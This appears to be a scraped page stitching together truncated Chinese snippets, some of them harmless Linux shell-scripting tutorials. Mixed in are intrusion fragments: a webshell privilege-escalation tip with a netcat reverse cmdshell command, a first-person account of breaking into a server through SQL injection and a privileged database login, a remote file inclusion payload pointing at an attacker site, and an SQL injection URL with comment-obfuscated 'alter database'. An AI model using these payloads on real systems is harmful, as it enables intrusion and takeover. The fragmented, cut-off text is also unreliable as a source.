Linux 的交互式 Shell 与 Shell 脚本存在一定的差异，主要是由于后者存在一个独立的运行进程，因此在获取进程 pid 上二者也有所区别。在已知进程名的前提下，交互式 Shell 获取进程 pid 有很多种方法，典型的通过 grep 获取 pi

平时在处理一个或几个机器运行环境时，一个机器一个机器处理也能接受，但是如果是一批机器，几十或几百台，要是一台一台去安装环境，光是输入同一的命令，估计你自己都想吐，所有聪明的人会想一些偷懒的办法，确实可以找到一些省时省力的方法，比如写一个批量处理shell脚

Critical="当前系统登录用户人数超过1人，具体人数为：$LoginUser 个,请确认操作者人数。MemTotal=`free -m | grep Mem | awk -F: '{print $2}' | awk '{print $1}'

以上思路能够打印出最简单的棋盘，但是shell中一个空格的显示形状并非正方形，而且是空格的高度大于宽度。高度则带入给变量赋值后当作循环的次数。select COL1 in red green yellow blue purple skyblue white

webshell提权小技巧 cmd路径: c:\windows\temp\cmd.exe nc也在同目录下 例如反弹cmdshell： "c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\c

有鉴于此，我将尽力完整描述入侵过程中的思考方式。当时还没有嗅到终端口令，我在webshell里考虑着提权的可能性。mssql是2005版的，连接用户权限是db_owner，作为不大。我之前入侵kk同段server的时候遇到过，这玩意的配置文件默认会泄漏口令

再用superscan扫一下，发现开放的端口有很多个，初步估计是软件防火墙。用nbsi注入，发现是sa口令登陆，去加了一个用户，显示命令完成。我用netstat -an察看了一下,发现有3389,再从net start 里发现是对方的防火墙搞的鬼。

spaw_root=http://website2/，其中website1是有漏洞的网站，website2是攻击的网站，website2所在的目录下有class/lang.class.php文件。spaw_root=http://www.baidu.com

Shell 变量的作用域，就是 Shell 变量的有效范围。在不同的作用域中，同名的变量不会相互干涉，就好像 A 班有个叫小明的同学，B 班也有个叫小明的同学，虽然他们都叫小明，但是由于所在的班级不同，所以不会造成混乱。但是如果同一个班级中有两个叫小明的同

注:转载就注入出自'孤孤浪子博客'原创 http://itpro.blog.163.com 第一步 http://itpro.blog.163.com/test.asp';alter/**/database/**/[netwebhome]/**/set/*